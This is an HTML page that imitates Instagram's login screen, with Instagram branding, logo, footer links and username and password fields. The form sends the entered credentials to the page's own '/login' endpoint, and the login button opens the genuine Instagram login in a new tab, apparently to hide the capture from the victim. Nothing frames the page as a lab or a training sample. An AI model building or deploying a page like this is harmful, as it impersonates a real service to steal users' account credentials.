<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="Nkarner/ab6eff595bb1.png">
    <link rel="stylesheet" href="InstaForm.css">
    <title>Instagram</title>
</head>
<body>
    <div class="user-credential-div">
        <div class="box">
            <img class="instagram-logo" src="Nkarner/instagram-logo-icon-transparent-background-free-png.png"></img>
            <form action="/login" method="POST">
                <div>
                    <input type="text" id="username" name="username" placeholder="Username, email or mobile number" class="user-email-place"><br><br>
                </div>
                <div>
                    <input type="password" id="password" name="password" placeholder="Password" class="user-password-place"><br><br>
                </div>
                <div>
                    <button type="submit" class="login-button" onclick="window.open('https://www.instagram.com/accounts/login/', '_blank')">
                        <span>Log&nbsp;in</span>
                    </button>
                </div>
                <a href="https://www.instagram.com/accounts/password/reset/">
                    <h5>
                        <p class="forgot-password-text">Forgot password?</p>
                    </h5>
                </a>
                <div>
                    <button type="button" class="create-account" onclick="window.open('https://www.instagram.com/accounts/emailsignup/?next=/', '_blank')">
                    <span>Create new account</span>
                    </button>
                </div>
                <div>
                    <img src="Nkarner/Meta-Logo.png" class="meta-logo" onclick="window.open('https://about.meta.com/', '_blank')">
                </div>
            </form>
        </div>
    </div>
        <footer>
            <h5>
                <div class="footer">
                    <p class="first-line">
                        <a target="_blank" class="f-line-elements" href="https://about.meta.com/">
                            <span>Meta</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/">
                            <span>About</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/en_US/blog">
                            <span>Blog</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/about-us/careers">
                            <span>Jobs</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://help.instagram.com/">
                            <span>Help</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://developers.facebook.com/docs/instagram">
                            <span>API</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://privacycenter.instagram.com/">
                            <span>Privacy</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://help.instagram.com/581066165581870/">
                            <span>Terms</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/directory/profiles/">
                            <span>Top Accounts</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/explore/locations/">
                            <span>Locations</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/web/lite/">
                            <span>Instagram Lite</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.threads.net/">
                            <span>Threads</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.facebook.com/help/instagram/261704639352628">
                            <span>Contact Uploading & Non-Users</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.meta.com/technologies/meta-verified/">
                            <span>Meta Verified</span>
                        </a>
                    </p>
                    <p class="second-line">
                        <span class="s-line-elements">English <img width="12" height="12" src="https://img.icons8.com/ios-glyphs/30/expand-arrow--v1.png" alt="expand-arrow--v1" /></span>
                        <span class="s-line-elements">© 2026 Instagram from Meta</span>
                    </p>
                </div>
            </h5>
        </footer>
    </div>
    <script src="InstaForm.js"></script>
</body>
</html>